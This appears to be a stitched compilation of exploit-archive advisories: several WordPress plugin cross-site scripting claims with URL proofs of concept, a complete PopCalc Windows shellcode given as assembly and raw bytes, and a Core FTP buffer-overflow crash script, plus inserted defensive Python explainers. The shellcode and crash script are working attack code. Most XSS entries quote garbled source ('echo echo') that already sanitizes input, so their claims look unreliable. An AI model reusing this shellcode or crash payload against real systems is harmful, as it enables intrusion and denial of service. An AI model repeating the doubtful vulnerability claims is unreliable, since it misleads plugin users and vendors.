WordPress Wordfence plugin version 7.4.6 suffers from a cross-site scripting vulnerability.

MD5 | 4c4a19b487de18d919fa7c64af08c127

[-] Title : WordPress plugin Wordfence 7.4.6 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/wordfence/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
wordfence/lib/diffResult.php
======================================================================================================
Vulnerable Source :
19: echo echo wp_kses($_GET['file'], array()
=======================================================================================================
POC :
http://localhost/wp-content/plugins/wordfence/lib/diffResult.php?file=[XSS]
=======================================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

WordPress WooCommerce plugin version 3.9.2 suffers from a cross-site scripting vulnerability.

MD5 | 94820451c430b8a8ed5f6fd5526603f8

[-] Title : WordPress plugin WooCommerce 3.9.2 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/woocommerce/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
woocommerce/includes/admin/class-wc-admin-attributes.php
======================================================================================================
Vulnerable Source :
189: echo echo absint($edit);
163: $edit = absint($_GET['edit']) : 0;
=======================================================================================================
POC :
http://localhost/wp-content/plugins/woocommerce/includes/admin/class-wc-admin-attributes.php?edit=[XSS]
=======================================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

WordPress TinyMCE-Advanced plugin version 5.3.0 suffers from a cross-site scripting vulnerability.

MD5 | 19b95d8771354cf5f9950a9c29d5c8f0

[-] Title : WordPress plugin TinyMCE-Advanced 5.3.0 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/tinymce-advanced/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
tinymce-advanced/insert-html-snippet/admin/snippets.php
==============================================================================================
Vulnerable Source:
200: echo echo esc_attr($search_name);
166: $search_name = sanitize_text_field($_POST['snippet_name']); //
if(isset($_POST)),
===============================================================================================
POC :
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 1 = Go To Web Page =
http://localhost/wp-content/plugins/tinymce-advanced/insert-html-snippet/admin/snippets.php

Step 2 = In the box : "snippet_name"
Step 3 = input box , Add JavaScript Code : alert('XSS')
===============================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

WordPress Really-Simple-SSL plugin version 3.2.9 suffers from a cross-site scripting vulnerability.

MD5 | 15d5b82236c6e9225a6320e5cee222b2

[-] Title : WordPress plugin Really-Simple-SSL 3.2.9 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/really-simple-ssl/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
really-simple-ssl/class-admin.php
======================================================================================================
Vulnerable Source :
3979: echo echo "var setting_name = '$setting_name'" . ";";
3978: $setting_name = sanitize_text_field($_GET['highlight']);
=======================================================================================================
POC :
http://localhost/wp-content/plugins/really-simple-ssl/class-admin.php?highlight=[XSS]
=======================================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************
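
The Really-Simple-SSL snippet quoted above drops a sanitized value into a JavaScript string literal, where tag stripping is beside the point: in that output context the characters that matter are quotes, backslashes and a literal "<". The following is an added Python model (not the plugin's code and not from the advisory) of that template beside a context-encoded version, with a check that both the JS parser and the HTML parser still see one intact statement; the template text and sample values are constructed for illustration.

```python
import json

def render_vulnerable(value):
    # The pattern the advisory quotes: a sanitized value dropped straight into
    # a JS string literal. Tag stripping does nothing about quotes/backslashes.
    return "var setting_name = '" + value + "';"

def render_hardened(value):
    # Encode for the output context instead: JSON encoding escapes quotes and
    # backslashes (WordPress offers wp_json_encode for this), and '<' is also
    # escaped so the value can never contain a literal "</script>" sequence.
    encoded = json.dumps(value).replace("<", "\\u003c")
    return "var setting_name = " + encoded + ";"

def js_statement_is_intact(js, prefix="var setting_name = "):
    """Scan the JS string literal after the prefix and report whether the
    statement ends exactly at the closing quote followed by ';'."""
    if not js.startswith(prefix) or len(js) <= len(prefix):
        return False
    i = len(prefix)
    quote = js[i]
    if quote not in "'\"":
        return False
    i += 1
    while i < len(js):
        ch = js[i]
        if ch == "\\":
            i += 2                      # an escaped character cannot close the literal
            continue
        if ch == quote:
            return js[i + 1:] == ";"    # anything else after the close is injected code
        i += 1
    return False                        # literal never closed

def safe_for_inline_script(js):
    # Both parsers must agree: the JS literal stays intact, and the HTML parser
    # never sees a '<' that could end the <script> element before JS runs.
    return js_statement_is_intact(js) and "<" not in js
```

A harmless value such as O'Brien is enough to break the first template; the hardened one survives it and a trailing backslash alike.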

223-byte, dynamic, null-free PopCalc shellcode.

MD5 | 6f8a6802f04b26ff3724b05afb440805

; Shellcode Title:  Dynamic, Null-Free PopCalc Shellcode (223 Bytes)
; Shellcode Author: Bobby Cooke
; Technique: PEB & Export Directory Table
; Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363

# Create a new stack frame
push ebp ; push current base pointer to the stack
mov ebp, esp ; Set Base Stack Pointer for new Stack-Frame
sub esp, 0x30 ; Decrement the stack by 48 (0x30) bytes to create space for saving pointers

# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x4], esp ; save PTR to string at bottom of stack (ebp)

# Find Base Address of the kernel32.dll Dynamically Linked Library
xor eax, eax ; clear eax register
mov eax, [fs:eax+0x30] ; EAX = Address_of_PEB
mov eax, [eax+0xc] ; EAX = Address_of_LDR
mov eax, [eax+0x1c] ; EAX = First Entry of InInitializationOrderModuleList - ntdll.dll
mov ebx, eax ; Get the second entry in the Initialization Order Module List (kernelbase.dll)
mov eax, [ebx] ; EAX = Second Entry of InInitializationOrderModuleList - kernelbase.dll
mov ebx, eax ; Get the third entry in the Initialization Order Module List (kernel32.dll)
mov eax, [ebx] ; EAX = Third Entry of InInitializationOrderModuleList - kernel32.dll
mov eax, [eax+0x8] ; move the kernel32.dll base address into the EAX register
; EAX = Base address of kernel32.dll
mov [ebp-0x8], eax ; Save the base address of kernel32.dll in the 2nd from bottom position on our stack

# Find Base Address of GetProcAddress Symbol
mov ebx, [eax+0x3c] ; save Relative Virtual Address (RVA/Offset) of New_Exe_Header to ebx.
add ebx, eax ; EBX = Address of new Header
mov ebx, [ebx+0x78] ; (RVA of New Exe Header) + 0x78 = RVA of Export-Table
add ebx, eax ; EBX now holds the address of the Export Table for kernel32.dll
mov edi, [ebx+0x20] ; PTR to RVA of Name-Pointer Table
add edi, eax ; (kernel32.dll baseAddr) + (RVA Name-Pointer Table) = Address of Name-Pointer Table
mov [ebp-0xC], edi ; save Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
mov ecx, [ebx+0x24] ; PTR to RVA of Ordinal Table
add ecx, eax ; (kernel32.dll baseAddr) + (RVA Ordinal Table) = Address of Ordinal Table
mov [ebp-0x10], ecx ; save PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
mov edx, [ebx+0x1c] ; PTR to RVA of Address Table
add edx, eax ; (kernel32.dll baseAddr) + (RVA Address Table) = Address of Address Table
mov [ebp-0x14], edx ; save PTR to Address Table Address at 5th from bottom of stack (ebp-20)
mov edx, [ebx+0x14] ; Value of Number of Functions/Symbols within the Tables
xor eax, eax ; Counter = 0
loop:
mov edi, [ebp-0xC] ; Address of the Name-Pointer Table
mov esi, [ebp-0x4] ; PTR to string "GetProcAddress",0x00
xor ecx, ecx ; clear ecx register -- used for counters/loops
cld ; clear direction flag, DF=0 -- Process strings from left to right
mov edi, [edi+eax*4] ; Entries in Name Pointer Table are 4 bytes long
; edi = RVA of Nth entry = (Address of Name-Pointer Table) + (Counter * 4)
add edi, [ebp-0x8] ; edi = address of string = (kernel32.dll base addr) + (RVA of Nth entry)
add cx, 0xf ; ecx = length of string to compare = sizeof("GetProcAddress") = 15 (14 Letters + 1 String Terminator Char)
repe cmpsb ; compare first 15 bytes of string. esi cmp edi
; if equal ZF=1, if not ZF=0
jz found ; if strings match end loop, else increment eax and loop again
inc eax ; counter ++
cmp eax, edx ; check if eax = Value of Number of Functions/Symbols within the Tables
jb loop ; If eax != edx, restart the loop

found:
; The Counter (eax) now holds the position of GetProcAddress within the table
mov ecx, [ebp-0x10] ; ecx = Address of Ordinal Table
mov edx, [ebp-0x14] ; edx = Address of Address Table
mov ax, [ecx + eax*2] ; ax = ordinal number = (Address of Ordinal Table) + (counter * 2)
mov eax, [edx + eax*4] ; eax = RVA of function = var20 + (ordinal * 4)
add eax, [ebp-0x8] ; eax = address of GetProcAddress = (RVA of GetProcAddress) + (kernel32.dll base addr)
; Address of GetProcAddress is now in EAX
mov [ebp-0x18], eax ; save Address of GetProcAddress onto Stack 0x18=24; 6th from bottom

; Call GetProcAddress(hModule &kernel32.dll, lpProcName "WinExec")
; hModule: address of the DLL module that contains the function.
; lpProcName: A Pointer to the beginning of an ASCII string of the functions name; null terminated.
mov edx, 0x63657878 ; "xxec"
shr edx, 8 ; edx = "xec",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits
push edx
push 0x456e6957 ; EniW : 456e6957
push esp ; $lpProcName -- push the address of the start of the string onto the stack
push dword [ebp-0x8] ; $hModule -- push base address of kernel32.dll to the stack
mov eax, [ebp-0x18] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
; The address of the queried function is returned into the EAX register.
mov [ebp-0x1c], eax ; save Address of WinExec onto Stack 0x1c=28; 7th from bottom

; Call WinExec( LPCSTR lpCmdLine, UINT uCmdShow );
; lpCmdLine = "calc.exe" # String to program path
; uCmdShow = 0x00000001 # SW_SHOWNORMAL - displays a window
xor ecx, ecx ; clear ecx register
push ecx ; string terminator 0x00 for "calc.exe" string
push 0x6578652e ; exe. : 6578652e
push 0x636c6163 ; clac : 636c6163
mov eax, esp ; save pointer to "calc.exe" string in eax
inc ecx ; uCmdShow SW_SHOWNORMAL - 0x00000001
push ecx ; uCmdShow *ptr to stack in 2nd position - LIFO
push eax ; lpcmdLine *ptr to stack in 1st position
mov eax, [ebp-0x1c] ; Move the address of WinExec into the EAX register
call eax ; Call the WinExec Function.

; Call GetProcAddress(hModule &kernel32.dll, lpProcName "ExitProcess")
xor ecx, ecx
mov ecx, 0x73736501 ; 73736501 = "sse",0x01 // "ExitProcess",0x0000 string
shr ecx, 8 ; ecx = "ess",0x00 // shr shifts the register right 8 bits
push ecx ; sse : 00737365
push 0x636f7250 ; corP : 636f7250
push 0x74697845 ; tixE : 74697845
push esp ; push pointer to string to stack for 'ExitProcess',0x00
push dword [ebp-0x8] ; push base address of kernel32.dll to stack
mov eax, [ebp-0x18] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress(PTR *kernel32.dll, "ExitProcess",0x00)
; EAX = ExitProcess Address
mov [ebp-0x20], eax ; save Address of ExitProcess onto Stack 0x20=32; 8th from bottom

; Call ExitProcess(ExitCode)
xor edx, edx
push edx ; ExitCode = 0
mov eax, [ebp-0x20] ; ExitProcess(ExitCode)
call eax

# Compiled on Kali with nasm
; nasm -f win32 dynaCalc.asm -o dynaCalc.o
; for i in $(objdump -D dynaCalc.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
; RAW:
; 5589e583ec3031c066b8737350686464726568726f634168476574508965fc31c0648b40308b400c8b401c89c38b0389c38b038b40088945f88b583c01c38b5b7801c38b7b2001c7897df48b4b2401c1894df08b531c01c28955ec8b531431c08b7df48b75fc31c9fc8b3c87037df86683c10ff3a674054039d072e48b4df08b55ec668b04418b04820345f88945e8ba78786563c1ea08526857696e4554ff75f88b45e8ffd08945e431c951682e6578656863616c6389e04151508b45e4ffd031c9b901657373c1e908516850726f63684578697454ff75f88b45e8ffd08945e031d2528b45e0ffd0
; Python/C format:
; "\x55\x89\xe5\x83\xec\x30\x31\xc0\x66\xb8\x73\x73\x50\x68\x64\x64\x72\x65\x68\x72\x6f\x63"
; "\x41\x68\x47\x65\x74\x50\x89\x65\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x40\x1c\x89"
; "\xc3\x8b\x03\x89\xc3\x8b\x03\x8b\x40\x08\x89\x45\xf8\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01"
; "\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf4\x8b\x4b\x24\x01\xc1\x89\x4d\xf0\x8b\x53\x1c\x01\xc2"
; "\x89\x55\xec\x8b\x53\x14\x31\xc0\x8b\x7d\xf4\x8b\x75\xfc\x31\xc9\xfc\x8b\x3c\x87\x03\x7d"
; "\xf8\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf0\x8b\x55\xec\x66\x8b"
; "\x04\x41\x8b\x04\x82\x03\x45\xf8\x89\x45\xe8\xba\x78\x78\x65\x63\xc1\xea\x08\x52\x68\x57"
; "\x69\x6e\x45\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xe4\x31\xc9\x51\x68\x2e\x65\x78"
; "\x65\x68\x63\x61\x6c\x63\x89\xe0\x41\x51\x50\x8b\x45\xe4\xff\xd0\x31\xc9\xb9\x01\x65\x73"
; "\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\xff\x75\xf8\x8b\x45\xe8"
; "\xff\xd0\x89\x45\xe0\x31\xd2\x52\x8b\x45\xe0\xff\xd0"
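
The export-table walk in the listing above (e_lfanew at 0x3c, the export directory RVA at +0x78 of the PE32 header, the name, ordinal and address tables at +0x20, +0x24 and +0x1c) is the same lookup any PE parser performs, and recognising it is how an analyst spots an API resolver in an unknown blob. Below is an added Python model, not part of Bobby Cooke's listing, that builds a synthetic PE32 image in which every RVA is simply a buffer offset and then resolves a name the way the assembly does; the field offsets are the real PE32 ones, the image layout and sample RVAs are constructed.

```python
import struct

# Constructed layout: where the fake PE header and export directory live.
NT_HEADER = 0x40
EXPORT_DIR = 0x100

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]

def build_image(exports):
    """exports: list of (name_bytes, function_rva). Builds a minimal image
    whose RVAs equal buffer offsets, with a sorted name table and an ordinal
    table that maps each name back to its slot in the address table."""
    img = bytearray(0x400)
    n = len(exports)
    struct.pack_into("<I", img, 0x3c, NT_HEADER)                 # e_lfanew
    img[NT_HEADER:NT_HEADER + 4] = b"PE\0\0"
    struct.pack_into("<I", img, NT_HEADER + 0x78, EXPORT_DIR)    # export dir RVA (PE32; PE32+ keeps it at +0x88)
    funcs, names, ords = 0x200, 0x200 + 4 * n, 0x200 + 8 * n
    struct.pack_into("<III", img, EXPORT_DIR + 0x14, n, n, funcs)  # NumberOfFunctions, NumberOfNames, AddressOfFunctions
    struct.pack_into("<II", img, EXPORT_DIR + 0x20, names, ords)   # AddressOfNames, AddressOfNameOrdinals
    for i, (_, rva) in enumerate(exports):
        struct.pack_into("<I", img, funcs + 4 * i, rva)
    strings = ords + 2 * n
    for j, i in enumerate(sorted(range(n), key=lambda k: exports[k][0])):
        name = exports[i][0] + b"\0"
        struct.pack_into("<I", img, names + 4 * j, strings)      # name table entry: RVA of the string
        struct.pack_into("<H", img, ords + 2 * j, i)             # ordinal: index into the address table
        img[strings:strings + len(name)] = name
        strings += len(name)
    return bytes(img)

def resolve_export(img, target):
    """Header -> export directory -> linear scan of the name table ->
    ordinal table -> address table, mirroring the listing step by step."""
    nt = u32(img, 0x3c)                               # mov ebx, [eax+0x3c]
    exp = u32(img, nt + 0x78)                         # mov ebx, [ebx+0x78]
    # The listing bounds its loop with NumberOfFunctions (+0x14); the name
    # table actually has NumberOfNames (+0x18) entries, which is used here.
    num_names = u32(img, exp + 0x18)
    funcs, names, ords = u32(img, exp + 0x1c), u32(img, exp + 0x20), u32(img, exp + 0x24)
    needle = target + b"\0"                           # repe cmpsb with ecx = len + 1 compares the terminator too
    for i in range(num_names):
        s = u32(img, names + 4 * i)                   # mov edi, [edi+eax*4]
        if img[s:s + len(needle)] == needle:
            ordinal = u16(img, ords + 2 * i)          # mov ax, [ecx+eax*2]
            return u32(img, funcs + 4 * ordinal)      # mov eax, [edx+eax*4]
    return None

# Constructed sample with address-table slots deliberately out of name order.
SAMPLE = build_image([(b"WinExec", 0x5000), (b"GetProcAddress", 0x3000), (b"ExitProcess", 0x1000)])
```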

WordPress Prismatic plugin version 2.3 suffers from a cross-site scripting vulnerability.

MD5 | a0d39eb5a5e494a8a016235265ecb650

[-] Title : WordPress plugin Prismatic 2.3 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/prismatic/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
prismatic/inc/settings-display.php
======================================================================================================
Vulnerable Source :
35: echo echo $tab_active;
27: $tab_active = sanitize_text_field($_GET['tab']) : 'tab1';
=======================================================================================================
POC :
http://localhost/wp-content/plugins/prismatic/inc/settings-display.php?tab=[XSS]
=======================================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

WordPress Popup-Builder plugin version 3.61.1 suffers from a cross-site scripting vulnerability.

MD5 | f7012987c3cc2c05c511a4205cca25c1

[-] Title : WordPress plugin Popup-Builder 3.61.1 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/popup-builder/
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
=====================================================================================================
Vulnerable page :
popup-builder/com/classes/dataTable/Subscribers.php
======================================================================================================
Vulnerable Source :
141: echo echo $selectedDate; // AdminHelper.php
136: $selectedDate = esc_sql($_GET['sgpb-subscribers-date']);
=======================================================================================================
POC :
http://localhost/wp-content/plugins/popup-builder/com/classes/dataTable/Subscribers.php?sgpb-subscribers-date=[XSS]
=======================================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Core FTP Lite version 1.3 suffers from a denial of service vulnerability.

MD5 | c595413a449072d8c312591dc40d5240

# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC)
# Exploit Author: Berat Isler
# Date: 2020-02-20
# Vendor Homepage: http://www.coreftp.com/
# Software Link Download: http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437
# Version: Core FTP 1.3cBuild1437
# Tested on : Windows 7 32-bit

# First step: run the exploit script; it will generate a new file with the name "mi.txt".
# Then start the Core FTP application and find the "username" textbox.
# After that, paste the content of "mi.txt" into the "username" field like this --> "AAAAAAAAA"
# You don't need to click anything because the application has already crashed.

This is the code:

#!/usr/bin/python

# Build the oversized "username" value and write it to mi.txt
b0f = "A" * 7000
payload = b0f
try:
    f = open("mi.txt", "w")
    print("[+] Creating %s bytes payload generated .. .. ..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created :) ")
except IOError:
    print("File cannot be created :((")

WordPress Ultimate-Member plugin version 2.1.3 suffers from a cross-site scripting vulnerability.

MD5 | 3cbf268b58052c6f4f6bdd7d408ea24c

[-] Title : WordPress plugin Ultimate-Member 2.1.3 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/ultimate-member/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
ultimate-member/includes/admin/core/class-admin-settings.php
==============================================================================================
Vulnerable Source:
2876: echo echo wp_strip_all_tags($_POST['um-install-info']);
===============================================================================================
POC :
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php

Step 1 = Go To Web Page =
http://localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-settings.php

Step 2 = In the box : "um-install-info"

Step 3 = input box , Add JavaScript Code : alert('XSS')
===============================================================================================
************************
* ==> Contact With Us :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************